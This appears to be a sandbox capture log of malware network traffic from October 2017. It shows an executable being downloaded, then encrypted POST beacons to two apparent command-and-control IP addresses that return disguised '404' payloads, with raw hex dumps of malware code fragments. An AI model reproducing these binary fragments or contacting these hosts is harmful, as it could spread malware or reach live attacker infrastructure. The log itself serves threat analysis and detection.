20 00 00 60 2e 64 61 74 61 00 00 00 d8 08 00 00 00 50 00 00 00 10 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 e8 06 00 00 00 60 00 00 00 10 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 66 00 00 00 00 00 00 00 09 e0 00 00 00 70 00 00 00 f0 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 07 00 00 00 60 01 00 00 10 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 01 00 00 00 70 01 00 00 10 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: 18000MZ@!L!This program cannot be run in DOS mode."P`z3z3z337z3z33kz33z3{3gz3i3z3i3z33z33z3i3z3Richz3PELY@0`P@@hb`p`.text0@ `.dataPP@.edata``@@fpp@.rsrc``@@.relocpp@B
93
Okt 17, 2017 21:53:59.048233032 MESZ8049191209.59.172.114192.168.1.16Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:
95
Okt 17, 2017 21:53:59.048242092 MESZ8049191209.59.172.114192.168.1.16Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:
95
Okt 17, 2017 21:53:59.157274961 MESZ8049191209.59.172.114192.168.1.16Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:
96
Okt 17, 2017 21:53:59.178539991 MESZ8049191209.59.172.114192.168.1.16Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: UVSW8EMUu}D$$|$ T$t$tmD$(L$,L$T$t$1 EET$,D$(D$PxD$ L$AL$zJ+D$
98
Okt 17, 2017 21:53:59.178563118 MESZ8049191209.59.172.114192.168.1.16Data Raw: f0 07 48 5b 2b 8c 24 80 01 00 00 89 e2 c7 42 04 05 00 00 00 c7 02 00 00 00 00 8b 15 80 60 40 00 89 44 24 54 89 4c 24 50 ff d2 83 ec 08 8b 8c 24 68 01 00 00 89 e2 89 0a 8b 0d 70 60 40 00 89 44 24 4c ff d1 83 ec 04 8b 8c 24 68 01 00 00 89 e2 8b 74
Data Ascii: H[+$B`@D$TL$P$hp`@D$L$ht$PrJl`@D$HD$D1$4$,$(?$h$h$D$D$D$@L$<)@2b@:b@d`@$lD$8
99
Okt 17, 2017 21:53:59.178960085 MESZ8049191209.59.172.114192.168.1.16Data Raw: e8 8b 54 24 50 89 44 24 4c 8b 44 24 50 8b 74 24 3c 81 f2 98 79 03 58 01 d6 05 9a 86 fc a7 89 74 24 24 39 c6 74 c9 e9 3e ff ff ff cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 56 57 83 e4 f8 83 ec 58 8b 45 0c 8b 4d 08 8b 54 24 44 83 f9 00 0f 94 c3
Data Ascii: T$PD$LD$Pt$<yXt$$9t>USVWXEMT$DD$@L$<T$8D$4L$0T$,2wOGt$@w\$<D$(L$$OD$HL$LT$$Bt$((L$LD$HD$ 9T$0t$4r{1[T$8L$t$
100
Okt 17, 2017 21:53:59.181273937 MESZ8049191209.59.172.114192.168.1.16Data Raw: 00 8d 65 f4 5b 5f 5e 5d c3 8d 44 24 60 89 44 24 44 89 e1 89 01 c7 41 08 0e 00 00 00 c7 41 04 f1 60 40 00 e8 4a 1b 00 00 8b 44 24 44 89 e1 89 01 e8 8d 12 00 00 8b 8c 24 98 00 00 00 f7 d1 8b 54 24 38 89 8c 24 98 00 00 00 8b 4c 24 2c 89 8c 24 8c 00
Data Ascii: e[_^]D$`D$DAA`@JD$D$T$8$L$,$t$0$WGGD$LD$053L$,$$D$<D$\D$\P@4P@|$<$V\$LD$($59nP@1J
102
Okt 17, 2017 21:53:59.181305885 MESZ8049191209.59.172.114192.168.1.16Data Raw: c2 19 f4 e9 f5 89 74 24 18 39 d1 0f 84 11 01 00 00 e9 63 02 00 00 a1 18 60 40 00 ff d0 8c 9e c8 1f 0e fe c3 9f 8f d6 82 d7 26 10 59 62 39 91 66 2e 7d 97 25 5e 40 89 4e ca db 8d c4 34 db a9 32 67 cd 59 68 6d 52 bc 1b c5 aa 89 44 24 24 83 7c 24 24
Data Ascii: t$9c`@&Yb9f.}%^@N42gYhmRD$$|$$@mH`@&Yb9f.}%^@N42gYhmRD$$D$0D$0D$0D$$D$L$0L$0L$0SD$0 D`@&Yb9f.}%^@N
103
Okt 17, 2017 21:53:59.185682058 MESZ8049191209.59.172.114192.168.1.16Data Raw: 14 88 c1 88 4c 24 0f 8b 44 24 18 8b 54 24 14 0f a5 d0 8a 4c 24 0f d3 e2 31 f6 8a 4c 24 0f f6 c1 20 0f 45 c2 0f 45 d6 89 44 24 2c 89 54 24 28 e9 52 ff ff ff 8b 44 24 1c 83 f8 00 74 aa e9 63 ff ff ff cc cc cc cc cc cc cc cc 55 89 e5 57 56 53 83 e4
Data Ascii: L$D$T$L$1L$ EED$,T$(RD$tcUWVSPEL$@T$DD$KD$8{qD$7Xt$8D$$R.r&D$D$0\$#t$L$T$D$KL$i/T$<T$bd$"T$$$D$+`@t|$"$D$+#L$L$+
104
Okt 17, 2017 21:53:59.185875893 MESZ8049191209.59.172.114192.168.1.16Data Raw: c7 44 24 08 0e 00 00 00 89 5c 24 1c 89 4c 24 18 89 74 24 14 e8 3d 0a 00 00 c7 44 24 2c 00 00 00 00 eb 3e 8b 44 24 30 8d 65 f4 5f 5e 5b 5d c3 8b 84 24 a8 00 00 00 35 e1 ed 78 2f 8b 8c 24 94 00 00 00 83 c1 01 89 4c 24 2c 8b 94 24 9c 00 00 00 81 ea
Data Ascii: D$\$L$t$=D$,>D$0e_^[]$5x/$L$,$F"6$9t;L$,$T$ L$T$ t$1 EE$$$t$L44f+$$^7fLTT9TOD$T$2
105
Okt 17, 2017 21:54:14.105124950 MESZ49192443192.168.1.165.196.73.150POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 5.196.73.150:443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 23 26 83 00 fd 7e f3 5a e7 77 74 e7 92 19 0a 44 14 b3 5e bf 9a b8 0f a8 71 5f 02 bd 78 63 62 c0 38 96 8e 02 2b 17 ea cb 53 89 3c 23 d7 ec 91 9a 97 14 59 eb 1e 5c d9 93 6e f1 fc 4d b3 36 6f 58 6c e1 ad 52 1d f0 15 7a 8a f5 a2 b4 46 d7 2c 8a 04 05 07 6a f6 68 85 ff e4 90 e8 ce 7c 0e 3b 0c 3f f7 ac 28 1b 78 c8 2a 6d f2 b5 32 d8 9a d0 5e 3a 58 9c 1a 45 ba 23 b2 e2 05 ef 9c 76 c2 92 c9 33 92 b3 47 cc 44 08 5a c3 a2 3a 26 50 a4 f7 a1 ab e7 03 3a 36 2f 6f 8a 95 b4 50 0e d1 af 9c 3c 22 da 28 f1 f5 9a f3 ae d8 64 99 e0 29 92 81 38 0c 21 02 8f 80 e3 ff 5d f4 ed 1e b0 ab e5 62 fd 5b 18 94 a4 15 8c e3 f6 d9 5c 80 a9 96 8e 35 58 bd e0 95 42 a6 ab b3 91 93 40 ac 8e a6 23 06 21 1d 6e a1 a8 43 42 37 26 fd d1 5c 1b e9 06 4f 21 da 7a 2c fd d9 d9 cf ec 53 f2 fa dd b6 0f 93 c4 50 d3 c2 b6 6e eb 0a 64 33 98 c9 ea f8 26 dd 77 7b 6f f0 ff f8 23 b6 53 85 ec 72 15 db bd a1 6c ac 40 35 d7 a6 33 a1 d1 c6 29 a3 fb f6 2b b9 00 c2 bd 8e 55 18 c9 76 2a 20 59 b4 05 7a 8a a1 6d cd 97 12 d8 0c 3a 46 88 f1 c9 95 ea e1 9b 28 5f 6b b1 c4 13
Data Ascii: #&~ZwtD^q_xcb8+S<#Y\nM6oXlRzF,jh|;?(x*m2^:XE#v3GDZ:&P:6/oP<"(d)8!]b[\5XB@#!nCB7&\O!z,SPnd3&w{o#Srl@53)+Uv* Yzm:F(_k
195
Okt 17, 2017 21:54:14.579498053 MESZ443491925.196.73.150192.168.1.16HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 17 Oct 2017 19:54:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 60868
Connection: keep-alive
Data Raw: 3b c1 24 4a ab 01 67 69 96 04 db 98 58 ae d2 75 4c 64 5c d7 4a ab b2 d5 ea c7 22 8f 4d 8a 91 c6 10 84 ba c2 97 c2 f4 0e 34 d8 2c bb 74 33 dc 72 f8 d8 d1 bb 96 4e fa 2f ce 21 f2 9e 3f 94 01 f3 66 88 db d6 c3 bb b9 e1 01 f0 ec 36 02 eb 7b ba a8 3f 29 e6 f2 25 5a 01 81 cf 57 fa cd 90 07 56 f9 b4 bb e0 96 58 26 aa 67 f1 9c 38 df 8d 38 68 60 e5 d4 d2 a9 e3 f7 98 9b 77 0f e2 78 d6 57 b2 ec 26 08 e6 c5 cb 51 ee c4 ac 55 85 95 08 16 78 88 6a c2 8a dc 7c 4c 58 18 47 5d 5d 49 09 d8 14 52 46 4d 96 87 cd 00 3a f2 98 eb 87 1f 15 c0 c9 6a 7c d6 d8 ae fa 9a f9 01 6c d3 f9 c7 f3 b4 d3 87 3f 09 77 b7 3e 20 dc eb ac 1a 50 22 c7 39 3b fc c2 53 55 06 5e 21 1c 3d 88 cd bd 58 fe e7 88 64 ab 87 8f d5 07 d3 40 b6 77 3c e0 17 86 57 24 93 bf a4 22 ce 3d fa 63 b1 32 32 d8 46 cd 02 45 e1 20 29 e0 98 ec 76 f3 74 71 fc bd 09 91 15 31 ca e5 59 90 fd fe db 0b eb 52 cd f2 db ed 7c e3 ca 76 f8 25 5b 4c 30 56 f2 b7 83 8f e3 33 d1 47 ba 88 f5 7d 35 8f f6 a3 6e f6 8b 2f 3c fe 2b 87 61 2f 71 f2 e6 0a b4 26 64 e4 10 a7 5a a8 4d b1 f9 dc d7 11 eb fb 6f f2 4b 2d 6e d2 9f e2 4e d4 6f ba 76 04 bd 2d cc 59 5d 71 79 86 e8 b8 ab 15 e4 a3 53 7a d6 bf 46 09 82 5f f8 ad 9b 29 f6 ce a0 50 1d 45 a6 4f 96 56 93 e4 99 87 32 21 68 1a 12 94 38 72 31 cd 81 36 89 63 2a fd e5 aa d5 9f 70 9c 6e 35 06 48 40 df 1e f3 70 b2 a3 4f 2f 7d 6d 85 52 01 04 3e 02 91 9e 0e 71 57 cc f9 ca 3b a9 d7 c4 96 e9 90 ad c5 7a 95 a3 84 b5 86 2b f4 0a 95 d4 d8 5a e8 60 fb 65 49 98 94 04 59 aa 11 75 f3 7e 2a 21 04 22 46 ba 32 9f cc 80 8a 93 1f d7 a1 0c 8a 2c 52 69 46 c0 12 dd 79 16 5d 2a c3 b4 fa 90 9d 35 e6 45 92 32 7f 31 5c f1 e8 0c 43 78 2f 0b 67 9f ed c8 59 9a 4f e1 bc 1c be 38 fe d0 1d 30 85 f2 8e 3c bf a0 0e f9 95 a3 fc e9 21 44 3e f6 db 74 be 5d 5c 1d 73 1a 52 bd 59 92 42 82 d0 c9 eb 97 7e a4 6d d8 cc bc 23 35 7e df e2 28 2c a1 6a 72 46 a4 4f 4f 4f 94 8d 55 ef 49 6c 80 83 56 e9 39 a6 2e 66 9c 7a e9 e1 dd 17 83 82 43 d4 9d d1 3a 5a e9 e9 26 24 f3 46 a7 ab 03 91 b5 d1 37 ae e8 ca 3d 94 9a 6b 74 44 e8 2f a6 56 76 04 8e 40 8e 87 94 4c f4 7b 15 09 7f c8 16 da 83 a2 21 85 4c d1 9f 0a 2a fc 24 93 8e 43 0e 7e 62 75 e4 61 17 e0 c5 d8 3f 40 81 86 6e f8 3c 8e 91 40 3b 08 be c5 fe c2 36 6b 7f b4 50 bb 7f 13 d4 bb 60 77 7c 54 49 e0 c8 35 bf fd b5 6c f8 b9 51 05 75 34 02 fd ea f5 c6 5e 09 47 13 69 c7 fb 92 c8 53 9b 4c 8e c0 61 f5 08 02 2d 7a 7e f2 38 a0 79 46 2d 4c af 2d a4 00 32 ab c8 3d 06 b9 a7 2a 29 f8 07 d0 5d af 5d 7f f1 9d 1f 34 d2 04 fc e4 df 9d 29 da 85 f5 81 81 47 1a 3c 65 ee a0 b4 52 23 08 d4 0e 01 5a 95 b3 9c c2 51 9a cb 6d 8a b6 f1 e9 e9 bb 58 43 77 f0 2c a1 f3 c3 2c 99 f8 58 5b a4 27 cf 71 9c 98 cd cb 26 f3 71 dc 9f 01 34 cb 74 15 6f 90 c1 9b 3f 62 51 19 0a 79 f2 70 a3 90 7e 4c 39 80 5b 3c 80 04 1d b0 01 f4 f7 01 76 6a e5 03 c2 0a c4 3e 02 36 1c ac d7 5f ca 1e 77 db 5e 28 10 0d a5 14 66 c1 6c cd c2 8e 97 15 e4 bd 93 20 1d fc de 7f 7d 5e ca 5a 91 01 2b bb c0 45 d5 89 25 95 16 e2 db 22 e3 dc ab 7b e8 b3 e4 f7 62 78 64 0e c3 ef 42 94 90 fc 39 8e fc c1 da 35 af d2 62 75 b2 f2 b4 37 7b 95 d1 ce b9 2f 64 88 28 fa ab 79 fb f0 f7 21 36 31 8f 87 e0 5f 41 a5 3f 04 60 56 02 4f d0 95 8e 9e 1e 54 34 51 bb 2f 04 2d 9b 5e 3e 10 69 90 3c 40 07 e2 97 74 ae 1a 59 66 64 86 70 fc 23 8d d6 94 8f 89 2a 43 39 83 c7 99 70 53 62 e0 e6 9e 6b b8 44 61 15 2e e8 94 3a 10 aa de 2f 96 a0 2c 86 64 ad 4b 2c 91 dc 24 77 04 d3 2b 47 e6 56 de d3 5b 82 a8 53 35 66 80 76 75 a0 31 df 6e 70 4b 72 a4 35 16 0c 08 b4 1f 64 79 6c 66 90 c6 89 fc 0d 98 f7 27 d8 66 8f c5 7e 51 ae ef 8f b2 29 60 ed da 97 87 7e 13 37 8d ed 6e ee 2a 05 d4 31 0e d6 4e bd b9 1f eb fe 02 ca 34 8a dd 28 0d bb 69 db bd fe e9 d1 42 c8 c8 e6 e8 86 9b c7 a2 29 9b 89 63 ae 41 31 8d 1e c6 20 72 54 50 f8 a7 df 2e ff 2f 81 86 e4 c2 ac 8d c7 8b c8 72 8d bb 97 47 61 eb 83 f4 84 2d 11 45 17 71 93 91 df b0 82 c5 fc fc 12 f4 eb 94 f5 59 f6 5d b6 ae e8 86 8b 28 48 60 13 3b c1 95 14 5d 2a aa 4e eb 72 b9 51 6c b6 6c 21 bb 39 cf e2 7a d0 ae 14 00 03 e5 b1 66 2a b9 6d 55 8c
Data Ascii: ;$JgiXuLd\J"M4,t3rN/!?f6{?)%ZWVX&g88h`wxW&QUxj|LXG]]IRFM:j|l?w> P"9;SU^!=Xd@w<W$"=c22FE )vtq1YR|v%[L0V3G}5n/<+a/q&dZMoK-nNov-Y]qySzF_)PEOV2!h8r16c*pn5H@pO/}mR>qW;z+Z`eIYu~*!"F2,RiFy]*5E21\Cx/gYO80<!D>t]\sRYB~m#5~(,jrFOOOUIlV9.fzC:Z&$F7=ktD/Vv@L{!L*$C~bua?@n<@;6kP`w|TI5lQu4^GiSLa-z~8yF-L-2=*)]]4)G<eR#ZQmXCw,,X['q&q4to?bQyp~L9[<vj>6_w^(fl }^Z+E%"{bxdB95bu7{/d(y!61_A?`VOT4Q/-^>i<@tYfdp#*C9pSbkDa.:/,dK,$w+GV[S5fvu1npKr5dylf'f~Q)`~7n*1N4(iB)cA1 rTP./rGa-EqY](H`;]*NrQll!9zf*mU
197
Okt 17, 2017 21:54:24.010586977 MESZ49193443192.168.1.165.196.73.150POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 5.196.73.150:443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 70 b5 e8 a1 54 a2 6e 8e 94 c5 a1 23 a5 f6 79 af c8 70 04 51 3f ea 22 fa e5 0c 66 69 fd 7a 99 8b 69 34 47 de 96 e8 9e c7 df 5f 8c e8 01 28 3e 36 5d 8e f5 4a a2 6a 2f 05 91 8f 96 f1 81 82 e1 95 56 8d b8 47 17 8d 18 b3 80 b3 73 f9 4f df 00 bc b4 6b 17 88 9c b1 0e 20 b0 4d f6 48 62 d3 21 20 ed aa b7 7f 01 0a 09 63 ec 30 6a 5e 46 7b 0c c8 2c fd a1 b5 bd 6e b8 36 ea 12 c6 e8 8c a4 da 0d 49 aa c6 f0 f2 fb 49 ef 71 26 07 60 b2 51 92 3b e8 e2 ad b7 97 55 b7 fa 08 a0 f9 c8 aa 1c 5c 78 76 b4 fd f8 85 1d ce 4d b6 a0 a1 e0 6b 91 36 1b 6b 01 82 fb f5 f8 7c 59 26 fa 67 a3 cb 5b 58 1c 17 e4 f1 56 f4 ae ba 60 cc 62 a8 b8 92 4f ed b9 cc 57 8c 9c 56 dc 06 cd 79 2e f2 19 e0 bf df 51 cd 95 09 ed 1e cc 46 9f ca 13 39 70 b1 48 e9 aa 1f 85 5b 76 8a 53 ef f3 c0 0b 56 66 30 03 a4 bf 81 8d de a6 3a 88 60 bd 4e 23 9e 05 e4 f9 76 5c 06 7f 54 dc 79 40 78 f9 d1 07 ff 26 2f dc 09 48 53 11 aa 35 1c ce 41 df ce 27 76 5f 2d 87 16 e5 db 90 88 62 7c eb 6d 98 16 8a 9c db d9 5a d0 b0 62 1c b5 93 a5 89 63 32 40 b4 15 23 3b e5 c1 25 4d 9e f5 cc
Data Ascii: pTn#ypQ?"fizi4G_(>6]Jj/VGsOk MHb! c0j^F{,n6IIq&`Q;U\xvMk6k|Y&g[XV`bOWVy.QF9pH[vSVf0:`N#v\Ty@x&/HS5A'v_-b|mZbc2@#;%M
260
Okt 17, 2017 21:54:25.853602886 MESZ443491935.196.73.150192.168.1.16HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 17 Oct 2017 19:54:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1148884
Connection: keep-alive
Data Raw: c7 97 d1 7a da 2f 4a 87 ca 61 bd 34 9c 17 cc fc b5 20 42 bd c4 a3 10 a9 d0 3d 14 65 11 b0 be 54 a6 75 a7 b8 b1 f9 e6 47 0b e9 9c 93 14 ec 9a 80 67 c3 1c 4a 1b 2d 1c 92 08 bb 5d b0 89 95 77 51 c2 4e d1 b9 ac ad c3 c8 06 c2 6c ff ec b2 68 04 71 77 aa 89 cb 89 75 89 a0 3f 36 21 98 a5 79 03 04 15 ce 63 29 cc 98 38 b2 e7 fc 86 8a 19 ac 16 3d 50 ce cf ec d7 41 ef e1 b1 35 bd 26 77 f7 42 e5 ab 4d 0b c4 e6 94 2d 49 d9 06 26 7d 99 c0 e3 34 56 01 8b 62 fc 17 dd e7 b8 cb 17 c8 81 47 a6 3f c2 92 be 86 9e 56 c9 de 1d de e3 8c 45 95 00 6c 39 34 4f f5 32 44 b5 ab c0 d1 61 4f 29 2c 69 43 ba 97 d1 73 5e 02 71 7b 55 cd 26 95 68 68 35 d4 7b a5 5e b0 17 09 e1 62 fd 64 2f 9b f6 49 a3 65 e6 7e 3a 2e 79 2c 4d bc a8 4b b1 86 02 19 5c a7 c8 b7 6e d0 d3 df 86 09 e4 9b 20 d1 42 46 c7 ac 3f 75 91 4f 79 ce 00 6d 98 24 1f c7 de 32 7d 2d cc 71 d2 e0 13 65 88 3d f6 81 2b 0b ee d0 4c 51 31 28 82 4e dd 0c 26 8a c7 ff 34 f1 b5 46 34 df af 0d 0e 2a 1b 91 57 ee 61 c2 af e3 13 eb 71 48 95 96 3e bf 0e a7 4f 85 3a 7e 54 b6 bc 1b 1b 19 40 df ff b7 f3 04 58 6b f5 cd 7c 61 2e c1 e3 1a d1 29 62 8c 40 80 e1 a8 84 ac 13 30 da a4 01 6e c7 03 d5 c3 fb 83 3a 62 ad 39 ab 31 57 0f c4 1c 8d 78 82 e1 4f 10 00 cf 7e c4 c7 7c 1c 4f 6b 85 15 ac 8d 18 12 20 ac b4 f2 c3 38 67 a8 3e 2c c0 e0 9c c2 b8 77 07 de 86 22 ac fa 8a c1 b7 16 1b d9 9f b4 f9 a9 2e 9e 8d c9 ec 9e 2f 42 a5 f2 ba 68 d0 99 d1 1e d2 12 c6 16 7e 49 6b 13 06 82 57 db bb 12 a1 ff 7a f4 94 ae 9e 2e d9 77 0b d3 cf 87 ab 33 a1 da 95 81 5b 93 3f a2 fe b9 56 53 5e ce 51 cb e9 f9 62 be 66 2a 7a 57 74 03 0c 3e 20 ca 1a bd 1e 54 5e 5b 19 ff 0c 0f 9d 72 2b 4b 11 b2 1b f1 06 4f af 0c ed 5a 50 c3 93 bc 18 7d 14 9f 8a 0c 39 25 7e 9c 62 20 89 41 cc 82 35 dd 1c 5f 3e 73 6d d0 91 11 68 5e 97 e6 6c 2b 1d 17 1f 85 6f c1 2c f2 9a 08 10 4b 07 52 fa 31 02 1d 68 52 94 a0 72 a9 f9 fa f1 e9 c4 0f fe 3b 24 47 80 7c a3 98 e5 4e ef d0 c1 1e a0 7a d3 73 27 37 6c 1a fd 9e 60 52 4d 23 2d 33 a8 be 3f 43 b6 98 0a 06 cc 0b 77 24 5d f8 8b d9 74 ec 9c 90 be 81 fa d1 fe 31 7a 77 82 96 3d 9f 08 70 bf 0b dc 4f b4 74 36 a2 5d c5 1b c0 f9 3a 77 b1 80 88 45 a5 11 0c 5c 86 89 17 5f 64 17 09 06 c2 f5 0b 21 15 2b bc f3 00 a2 00 da 4a f1 e0 34 b0 06 02 e9 33 21 fb 7e ca f8 cb bf 53 f1 6e d0 0f 73 00 06 48 39 51 8a 1b 1f 0a 91 50 e7 0e 83 12 b4 f8 13 96 95 34 4a 76 a9 f6 36 c9 16 f3 eb cc bb 31 f6 30 64 8f 55 f5 15 d2 de 48 2e 07 1f 7f cd 91 04 08 1c 6e 6a fc 2f 53 e4 15 41 8c 6e 46 5b 5a 55 f0 20 69 a8 8f 69 ca a9 8b f4 4c cc c7 25 ed 9e 0e ad fe b8 6d 95 3e 59 f1 fd c1 d1 87 cb f7 53 24 3d df 94 3e 05 8b 33 9c 4f 44 6b 0e 3b b2 48 b3 55 9e 89 ff 74 19 a6 86 e7 b2 26 89 4b 1d be f7 1e 14 9f af 49 30 4a 58 d1 56 a6 6d db 23 2d 32 b0 97 14 cf 82 f5 6e ad c7 ab 3f 65 04 e0 ec 38 1b fb ef a2 46 a1 6b f4 fd 5f 91 6e e9 c8 77 30 e8 ce 75 5c 3e 9c f3 5b 0b 7d ef bf bf ff f2 a3 a3 08 11 fa c6 1e 7c 1b 59 a3 01 b8 49 46 55 15 3b 05 b5 8e 07 61 12 b5 5d b5 43 e7 b6 ff 1b 81 4d 21 5d fb 6f 95 cc 71 01 5a ce 21 b1 60 05 c7 b9 39 57 81 f1 60 ca 9a d6 5c 07 9c d9 81 73 7c 95 84 18 8c a4 86 6e c3 66 24 ea ee 15 ee 6b 9c e1 31 b4 ad a6 92 d8 cf 2c 3d 71 af d5 24 09 0a 02 52 62 8a 7c 0d ed 15 80 a3 ee cc a6 fe 40 15 87 e9 eb 62 51 4c a6 8c 86 f1 69 46 1f 7e 47 72 d8 21 7f 4f 7b 9b f4 be e6 e2 27 11 bf 4b 38 b0 64 f0 33 7a 50 57 4b 48 21 98 c4 c9 53 7d 31 e9 15 5a 13 77 c5 da ca 60 64 ae 3b 39 24 13 d6 1f 55 c7 73 22 9f 0b e0 f9 1b 12 d8 14 12 98 26 df f1 7a c1 ae 94 55 3c f1 eb 5a 0b 9c 2c 8c dd 99 aa 2e 9c 20 0e 32 4e 6b 8b 69 a6 5e 0d 7c 94 15 4d 08 20 8e f5 34 55 4f 07 6a d7 ca aa 9f 97 e0 41 4c ab 21 97 89 a2 9b 38 91 10 b2 b0 7e 6d 6b 4a 58 66 46 ad e4 c5 b2 b2 58 72 eb c1 ca 33 7b e4 94 65 c1 ae 73 89 2d 1e 0a 4d f5 3d b1 99 41 4a 6c 13 49 96 86 8e 29 75 fd c8 b5 d7 f0 98 2f 91 31 dc ef 9e 7f 95 88 34 bf 9e 86 78 92 84 62 dd 2e 32 b0 04 46 c7 b1 f1 89 f6 e8 ea cc 4c 86 b6 ac b1 94 5f a4 2f c1 a3 bb 11 9a 23 f0 10 04 e1 a8 16 21 47 7e 22 8b 23 79 fb 39 17
Data Ascii: z/Ja4 B=eTuGgJ-]wQNlhqwu?6!yc)8=PA5&wBM-I&}4VbG?VEl94O2DaO),iCs^q{U&hh5{^bd/Ie~:.y,MK\n BF?uOym$2}-qe=+LQ1(N&4F4*WaqH>O:~T@Xk|a.)b@0n:b91WxO~|Ok 8g>,w"./Bh~IkWz.w3[?VS^Qbf*zWt> T^[r+KOZP}9%~b A5_>smh^l+o,KR1hRr;$G|Nzs'7l`RM#-3?Cw$]t1zw=pOt6]:wE\_d!+J43!~SnsH9QP4Jv610dUH.nj/SAnF[ZU iiL%m>YS$=>3ODk;HUt&KI0JXVm#-2n?e8Fk_nw0u\>[}|YIFU;a]CM!]oqZ!`9W`\s|nf$k1,=q$Rb|@bQLiF~Gr!O{'K8d3zPWKH!S}1Zw`d;9$Us"&zU<Z,. 2Nki^|M 4UOjAL!8~mkJXfFXr3{es-M=AJlI)u/14xb.2FL_/#!G~"#y9
262
Okt 17, 2017 21:54:30.015592098 MESZ49194443192.168.1.1693.180.157.92POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 93.180.157.92:443
Content-Length: 164
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 0d 14 aa 49 9c a1 77 0e a3 4b 37 7c 36 7f 3a 41 f1 6b 58 a1 21 b5 1e ed 34 70 cc 85 66 e1 99 76 a4 9c d2 72 fa db c2 6b 7b 42 4a 91 79 9d 6c a6 f9 f7 82 23 97 85 08 47 98 43 28 18 9f 6a e1 cd 2d e7 a4 1d d5 ed 0b 98 ea 0f e6 99 5b 70 d5 00 24 13 75 72 08 b9 17 96 62 bc a7 1b 3f 2b 4c 7d 56 8f 3c d5 8f 45 84 19 24 6e 32 cd a0 2f 31 47 17 9a 9c b2 f0 54 10 f8 2f 58 de a5 de 1e 48 2b 7e ce 44 6d ee 82 8b 56 18 90 d5 d2 66 a8 34 41 f4 f2 ce 23 70 32 5b dd 85 0c 2b 40 c3 cf 51 73 9e 89 da 8b
Data Ascii: IwK7|6:AkX!4pfvrk{BJyl#GC(j-[p$urb?+L}V<E$n2/1GT/XH+~DmVf4A#p2[+@Qs
1456
Okt 17, 2017 21:54:30.024694920 MESZ49195443192.168.1.165.196.73.150POST / HTTP/1.1
